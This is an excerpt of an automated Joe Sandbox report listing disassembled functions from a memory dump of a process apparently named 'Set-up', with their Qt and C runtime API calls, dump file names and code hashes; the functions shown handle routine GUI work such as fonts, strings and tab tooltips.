Part of subcall function 6BCD1D80: ??2@YAPAXI@Z.MSVCR100(00000078,B6508C7A,00000000,00000000,00000000,6C15BE6B,000000FF,6C12C395,00000000), ref: 6BCD1DA6
Part of subcall function 6BCD1D80: ??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BCD1DD9

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ??2@ObjectPrivate@@$DropFilter@@Object@@Object@@@PixmapRectShadowV0@@
String ID:
API String ID: 2848868525-0
Opcode ID: c498b3f399a5b1d97f386ae69759513fad1978c64b6e16e80bbae24ab41f3fba
Instruction ID: 25c38a1640342e99e0e1f746e5b3d4f88c694f249e000505c9329199719ec3ea
Opcode Fuzzy Hash: c498b3f399a5b1d97f386ae69759513fad1978c64b6e16e80bbae24ab41f3fba
Instruction Fuzzy Hash: 74116DB56087419FE710DF28C445746BBE4FF45714F008D2EE596C2B90E779D108CB92

Function 6BC149F0 Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON

Download Yara Rule

APIs

??4QStyleOption@@QAEAAV0@ABV0@@Z.QTGUI4(?), ref: 6BC149F9

Part of subcall function 6BE6A9E0: ??4QFontMetricsF@@QAEAAV0@ABVQFontMetrics@@@Z.QTGUI4(?,?,?,6BC1461E,?), ref: 6BE6AA13
Part of subcall function 6BE6A9E0: ??4QPalette@@QAEAAV0@ABV0@@Z.QTGUI4(?,?,?,?,6BC1461E,?), ref: 6BE6AA1F

??4QString@@QAEAAV0@ABV0@@Z.QTCORE4(?,?), ref: 6BC14A35
??4QIcon@@QAEAAV0@ABV0@@Z.QTGUI4(?), ref: 6BC14A42

Part of subcall function 6BCA15E0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,6BFA2398,?), ref: 6BCA15F1
Part of subcall function 6BCA15E0: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,6BFA2398,?), ref: 6BCA1600

??4QFont@@QAEAAV0@ABV0@@Z.QTGUI4(?,?), ref: 6BC14A5A

Part of subcall function 6BDCA8F0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,6BC14A5F,?,?), ref: 6BDCA906
Part of subcall function 6BDCA8F0: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,?,6BC14A5F,?,?), ref: 6BDCA917
Part of subcall function 6BDCA8F0: ??1QFontPrivate@@QAE@XZ.QTGUI4(?,?,?,?,6BC14A5F,?,?), ref: 6BDCA923
Part of subcall function 6BDCA8F0: ??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,6BC14A5F,?,?), ref: 6BDCA929

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: V0@@$AtomicBasicInt@@$Font$?deref@?ref@$??3@Font@@Icon@@MetricsMetrics@@@Option@@Palette@@Private@@String@@Style
String ID:
API String ID: 3607743092-0
Opcode ID: 3d5ca7d92c2014612421955596fced8cf8e35ad85af4adc978968f96015ba386
Instruction ID: 8fd3baabd03621440fd61f5c960a0707ffc6322b7be0f01f74a05345974df67d
Opcode Fuzzy Hash: 3d5ca7d92c2014612421955596fced8cf8e35ad85af4adc978968f96015ba386
Instruction Fuzzy Hash: DE11F779606B52AFC368CF29D590892FBF5BF99214340991ED58683F00D771F925CF90

Function 6C0CF520 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

??0QSizeF@@QAE@XZ.QTCORE4(?,?,?,6C0CFDC8,?,?,?,?,?,?,?,?,00000000), ref: 6C0CF54A
??0QSizeF@@QAE@XZ.QTCORE4(?,?,?,6C0CFDC8,?,?,?,?,?,?,?,?,00000000), ref: 6C0CF559
??0QSizeF@@QAE@XZ.QTCORE4(?,?,?,6C0CFDC8,?,?,?,?,?,?,?,?,00000000), ref: 6C0CF569
??0QRectF@@QAE@XZ.QTCORE4(?,?,?,6C0CFDC8,?,?,?,?,?,?,?,?,00000000), ref: 6C0CF598

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Size$Rect
String ID:
API String ID: 1890716006-0
Opcode ID: faf55696abb3808692361461d71b49670547ddb73e8cea8c93ad2152001f7aa5
Instruction ID: 3ec6648294fc9d87af8179a9ea7d82652411bafedfe1a21cef9d2c51b610dc6b
Opcode Fuzzy Hash: faf55696abb3808692361461d71b49670547ddb73e8cea8c93ad2152001f7aa5
Instruction Fuzzy Hash: D001B1B1700B008BD724CF14C4A479AB7F5FF85318F088A2DE19787790C7B469499B91

Function 6BDC9860 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,00000000,6C163D34,000000FF,6BDCA8E0), ref: 6BDC9897
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,00000000,6C163D34,000000FF,6BDCA8E0), ref: 6BDC98AF
??1QString@@QAE@XZ.QTCORE4(B6508C7A,?,?,00000000,6C163D34,000000FF,6BDCA8E0), ref: 6BDC98CE
??1QString@@QAE@XZ.QTCORE4 ref: 6BDC98DE

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?deref@AtomicBasicInt@@String@@
String ID:
API String ID: 3088701925-0
Opcode ID: 7d0ac8012cdfae5eb4b6a8d18a7605f2f98e0015156ad84b0547293787dd6490
Instruction ID: c9de8023228bf1c419952c8f35ac77013132b3cde13a1dcbb609ec1d9509487f
Opcode Fuzzy Hash: 7d0ac8012cdfae5eb4b6a8d18a7605f2f98e0015156ad84b0547293787dd6490
Instruction Fuzzy Hash: C00152B9105751DFEB18CF04D55875ABBF8FF49B24F008A1DE86683780D7789504CB96

Function 6BFB9830 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

??0QValidator@@QAE@PAVQObject@@@Z.QTGUI4(?,B6508C7A,?,?,?,6C18BD9D,000000FF,6BC13D27,00000000), ref: 6BFB985D

Part of subcall function 6BFB9050: ??2@YAPAXI@Z.MSVCR100(00000050,B6508C7A,?,?,?,?,6C1AB184,000000FF,6BC13AB7,00000000), ref: 6BFB9077
Part of subcall function 6BFB9050: ??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,?,?,?,?,?,?,?,00000000), ref: 6BFB9098
Part of subcall function 6BFB9050: ??0QLocale@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,00000000), ref: 6BFB90AC
Part of subcall function 6BFB9050: ??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6BFB90C6

?fromLatin1@QString@@SA?AV1@PBDH@Z.QTCORE4(?,6C1E4EF8,000000FF,?,B6508C7A,?,?,?,6C18BD9D,000000FF,6BC13D27,00000000), ref: 6BFB987C
??0QRegExp@@QAE@ABVQString@@W4CaseSensitivity@Qt@@W4PatternSyntax@0@@Z.QTCORE4(?,?,?,?,?,?,?,?,?,000000FF,6BC13D27,00000000), ref: 6BFB9892
??1QString@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,?,000000FF,6BC13D27,00000000), ref: 6BFB98A1

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: String@@$ObjectPrivate@@$??2@?fromCaseExp@@Latin1@Locale@@Object@@Object@@@PatternQt@@Sensitivity@Syntax@0@@V0@@Validator@@
String ID:
API String ID: 1584276721-0
Opcode ID: 90bac80c2b6c933b4651afb974dcf08b430257e36fcbc3d45b3b5ab77f7b12af
Instruction ID: 35f1f8e636e221ac000c07496615acd1056930ee969af2ad1bbd28678434bbe8
Opcode Fuzzy Hash: 90bac80c2b6c933b4651afb974dcf08b430257e36fcbc3d45b3b5ab77f7b12af
Instruction Fuzzy Hash: 72015E71108781AFD714CF58C859B5BBBE8FB59724F008A0EF4A9926C0D778A604CBA6

Function 6BF9E2A0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

?size@QListData@@QBEHXZ.QTCORE4(?,00000000,?,6BFA5802,00000000,00000000,?,?,6BC14424,?,00000000,?), ref: 6BF9E2BE
?at@QListData@@QBEPAPAXH@Z.QTCORE4(?,?,?,6BC14424,?,00000000,?), ref: 6BF9E2CB
??0QString@@QAE@ABV0@@Z.QTCORE4(?,?,?,6BC14424,?,00000000,?), ref: 6BF9E2E1
??0QString@@QAE@XZ.QTCORE4(?,00000000,?,6BFA5802,00000000,00000000,?,?,6BC14424,?,00000000,?), ref: 6BF9E2F5

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@ListString@@$?at@?size@V0@@
String ID:
API String ID: 2410151018-0
Opcode ID: dd26a153a53bd4c577e9ee80e9222a64ae50a9119a5e3df6900ece49ccdaae2f
Instruction ID: 708144be212047a23f81d0c7b9e3a2548401df408d01bc28ed1e8d8dc37c5564
Opcode Fuzzy Hash: dd26a153a53bd4c577e9ee80e9222a64ae50a9119a5e3df6900ece49ccdaae2f
Instruction Fuzzy Hash: 93F06D337052218BDA05AB48E40859EF7ADBF99761F14441EF442E7250CB24AD1AD7E5

Function 6BF9E150 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

?size@QListData@@QBEHXZ.QTCORE4(?,00000000,?,6BFA5552,00000000,00000000,?,?,6BC142F4,?,00000000,?), ref: 6BF9E16E
?at@QListData@@QBEPAPAXH@Z.QTCORE4(?,?,?,6BC142F4,?,00000000,?), ref: 6BF9E17B
??0QString@@QAE@ABV0@@Z.QTCORE4(?,?,?,6BC142F4,?,00000000,?), ref: 6BF9E191
??0QString@@QAE@XZ.QTCORE4(?,00000000,?,6BFA5552,00000000,00000000,?,?,6BC142F4,?,00000000,?), ref: 6BF9E1A5

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@ListString@@$?at@?size@V0@@
String ID:
API String ID: 2410151018-0
Opcode ID: 5293ea22fb256677b86cde877f68f9c2b17135ecbf2cad068880f91756d455ec
Instruction ID: 1689ea183ffc83120b9c1eeb2bcff9ff9e12808943a42e80e4b098e13bbd8514
Opcode Fuzzy Hash: 5293ea22fb256677b86cde877f68f9c2b17135ecbf2cad068880f91756d455ec
Instruction Fuzzy Hash: 7BF0C2333056209BCA00AB48A4045AEFBA9BF89365F14441EF502E3240C724AC1587E1

Function 6C0C3870 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

?transformToParent@QGraphicsItemPrivate@@QBE?AVQTransform@@XZ.QTGUI4(?,00000000,00000000,?,?), ref: 6C0C389C
?inverted@QTransform@@QBE?AV1@PA_N@Z.QTGUI4(00000000,?,?), ref: 6C0C38A3
?map@QTransform@@QBE?AVQPointF@@ABV2@@Z.QTGUI4(?), ref: 6C0C38AA

Part of subcall function 6BD7FC10: ?x@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC22
Part of subcall function 6BD7FC10: ?y@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC2E

??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6C0C38D2

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$Transform@@$?inverted@?map@?transformGraphicsItemParent@Private@@V2@@
String ID:
API String ID: 1065652511-0
Opcode ID: 93c251145b47c747251cb7d0968cb653d9cb7be2b8bc88a210576dc4c2078a20
Instruction ID: b245479bf755c13919928c20c149b24a6279246238d8b41934c6ef2483f23a20
Opcode Fuzzy Hash: 93c251145b47c747251cb7d0968cb653d9cb7be2b8bc88a210576dc4c2078a20
Instruction Fuzzy Hash: C4F08C357003049BE710AB78D849BABBBA4BF85718F14486DE4C48B240DB358868C3D2

Function 6BDDC5F0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,6BE6AA18,?,?,?,6BC1461E,?), ref: 6BDDC604
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,6BE6AA18,?,?,?,6BC1461E,?), ref: 6BDDC615
??1QFontPrivate@@QAE@XZ.QTGUI4(?,?,6BE6AA18,?,?,?,6BC1461E,?), ref: 6BDDC621
??3@YAXPAX@Z.MSVCR100(?,?,?,6BE6AA18,?,?,?,6BC1461E,?), ref: 6BDDC627

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicInt@@$??3@?deref@?ref@FontPrivate@@
String ID:
API String ID: 3879618281-0
Opcode ID: b62c39095244093c11aa9fe1cf742b94e141be2bb56285d8502dfeff66bcd3b6
Instruction ID: ea828f43aaa67fd9ef3de669345493896f06b07aa9424d88ebf22cfde32b349a
Opcode Fuzzy Hash: b62c39095244093c11aa9fe1cf742b94e141be2bb56285d8502dfeff66bcd3b6
Instruction Fuzzy Hash: F8F0A773300110CB87105FD8A4D496EF7AD9FD5661718507EF281CB210CB359811A7A2

Function 6BDCA8F0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,6BC14A5F,?,?), ref: 6BDCA906
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,?,6BC14A5F,?,?), ref: 6BDCA917
??1QFontPrivate@@QAE@XZ.QTGUI4(?,?,?,?,6BC14A5F,?,?), ref: 6BDCA923
??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,6BC14A5F,?,?), ref: 6BDCA929

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicInt@@$??3@?deref@?ref@FontPrivate@@
String ID:
API String ID: 3879618281-0
Opcode ID: 9f4aac926e0bfd3cdf77b1833a0d2e2140c62a186d4d0562e375d1db4045e6df
Instruction ID: a2c0b4073cf41fd51bc814446d32c2d5b8d65f09c7c4072f098239cf2886c9e4
Opcode Fuzzy Hash: 9f4aac926e0bfd3cdf77b1833a0d2e2140c62a186d4d0562e375d1db4045e6df
Instruction Fuzzy Hash: AFF082B6300214DBDB108F99988046FB7FDAF98660751443DE99A8B305CF35E90597A6

Function 6BC14370 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

??0QString@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,6C148F49,000000FF), ref: 6BC14398
?indexOf@QTabWidget@@QBEHPAVQWidget@@@Z.QTGUI4(?,00000000,?,?,?,6C148F49,000000FF), ref: 6BC143AE
?setTabToolTip@QTabWidget@@QAEXHABVQString@@@Z.QTGUI4(00000000,?,00000000,?,?,?,6C148F49,000000FF), ref: 6BC143B6
??1QString@@QAE@XZ.QTCORE4(00000000,?,00000000,?,?,?,6C148F49,000000FF), ref: 6BC143C7

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: String@@Widget@@$?index?setString@@@Tip@ToolWidget@@@
String ID:
API String ID: 4230800354-0
Opcode ID: b1ee29b67cfb7d61eff10b31d6114202f5a03fd62e0338b61185144e414fd807
Instruction ID: 8f1f6699064bc8edd801ce2970c5b344c36e176152ce597170c7a623eb6dd4ff
Opcode Fuzzy Hash: b1ee29b67cfb7d61eff10b31d6114202f5a03fd62e0338b61185144e414fd807
Instruction Fuzzy Hash: 89F06272208641EFC704CF58C844F5AB7E8FB48620F008A1EF466C37D0DB34A9048B92

Function 6BC14D90 Relevance: 6.0, APIs: 4, Instructions: 31windowCOMMON

Download Yara Rule

APIs

??1QFontMetricsF@@QAE@XZ.QTGUI4(B6508C7A,?,?,?,6C14905F,000000FF), ref: 6BC14DC3

Part of subcall function 6BDCA8C0: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,6BE6A917), ref: 6BDCA8C9
Part of subcall function 6BDCA8C0: ??1QFontPrivate@@QAE@XZ.QTGUI4 ref: 6BDCA8DB
Part of subcall function 6BDCA8C0: ??3@YAXPAX@Z.MSVCR100(?), ref: 6BDCA8E1

??1QString@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,6C14905F,000000FF), ref: 6BC14DD0
??1QIcon@@QAE@XZ.QTGUI4(?,?,?,6C14905F,000000FF), ref: 6BC14DDE

Part of subcall function 6BCA1E70: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,6BC12505,?,00000000,?,?,?,00000000,?,?,?,B6508C7A,?,?,6C150988,000000FF), ref: 6BCA1E7C

??1QStyleOption@@QAE@XZ.QTGUI4(?,?,?,6C14905F,000000FF), ref: 6BC14DED

Part of subcall function 6BE6A5F0: ??1QPalette@@QAE@XZ.QTGUI4(B6508C7A,?,?,00000000,6C172C4B,??1QStyleOption@@QAE@XZ,6BC14815,?,?,?,6C148F84,000000FF), ref: 6BE6A623
Part of subcall function 6BE6A5F0: ??1QFontMetricsF@@QAE@XZ.QTGUI4(B6508C7A,?,?,00000000,6C172C4B,??1QStyleOption@@QAE@XZ,6BC14815,?,?,?,6C148F84,000000FF), ref: 6BE6A633

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Font$?deref@AtomicBasicInt@@Metrics$??3@Icon@@Option@@Palette@@Private@@String@@Style
String ID:
API String ID: 896013959-0
Opcode ID: 5b1b69ba79c49a87cab22781a20c00be2e26f795bf3b8e80ed5a82140b2bb1e9
Instruction ID: 5aa83cabb4f7aa1eddfcd654a377f4da874f5bcc642b2e960ccad81d10a50898
Opcode Fuzzy Hash: 5b1b69ba79c49a87cab22781a20c00be2e26f795bf3b8e80ed5a82140b2bb1e9
Instruction Fuzzy Hash: 49F08C710087919FD304CF18D545B5AB7E8EB45B24F004A0EE4A683780EB78AA088AA3

Function 6BC14970 Relevance: 6.0, APIs: 4, Instructions: 31windowCOMMON

Download Yara Rule

APIs

??1QFontMetricsF@@QAE@XZ.QTGUI4(B6508C7A,?,?,?,6C148FBF,000000FF), ref: 6BC149A3

Part of subcall function 6BDCA8C0: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,6BE6A917), ref: 6BDCA8C9
Part of subcall function 6BDCA8C0: ??1QFontPrivate@@QAE@XZ.QTGUI4 ref: 6BDCA8DB
Part of subcall function 6BDCA8C0: ??3@YAXPAX@Z.MSVCR100(?), ref: 6BDCA8E1

??1QIcon@@QAE@XZ.QTGUI4(B6508C7A,?,?,?,6C148FBF,000000FF), ref: 6BC149B0

Part of subcall function 6BCA1E70: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,6BC12505,?,00000000,?,?,?,00000000,?,?,?,B6508C7A,?,?,6C150988,000000FF), ref: 6BCA1E7C

??1QString@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,6C148FBF,000000FF), ref: 6BC149BD
??1QStyleOption@@QAE@XZ.QTGUI4(?,?,?,6C148FBF,000000FF), ref: 6BC149CD

Part of subcall function 6BE6A5F0: ??1QPalette@@QAE@XZ.QTGUI4(B6508C7A,?,?,00000000,6C172C4B,??1QStyleOption@@QAE@XZ,6BC14815,?,?,?,6C148F84,000000FF), ref: 6BE6A623
Part of subcall function 6BE6A5F0: ??1QFontMetricsF@@QAE@XZ.QTGUI4(B6508C7A,?,?,00000000,6C172C4B,??1QStyleOption@@QAE@XZ,6BC14815,?,?,?,6C148F84,000000FF), ref: 6BE6A633

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Font$?deref@AtomicBasicInt@@Metrics$??3@Icon@@Option@@Palette@@Private@@String@@Style
String ID:
API String ID: 896013959-0
Opcode ID: cda444821d51411e89a63d21886209bc4891af884b375872a5482e2732f7926f
Instruction ID: b5d82e661d0017823970cc8b920013ca68760f129d5067c7f33d2fa3c7112c1d
Opcode Fuzzy Hash: cda444821d51411e89a63d21886209bc4891af884b375872a5482e2732f7926f
Instruction Fuzzy Hash: CCF04F751187919FD314CF18D545B5AB7E8EF49724F008A0EE896837C0EB78AA08CAA3

Function 6BDECA70 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

??9QBasicAtomicInt@@QBE_NH@Z.QTCORE4(00000001,?,6C0C0A7E), ref: 6BDECA7A
?detach_helper2@QHashData@@QAEPAU1@P6AXPAUNode@1@PAX@ZP6AX0@ZHH@Z.QTCORE4(6C108FA0,?,0000000C,00000004,?), ref: 6BDECA95
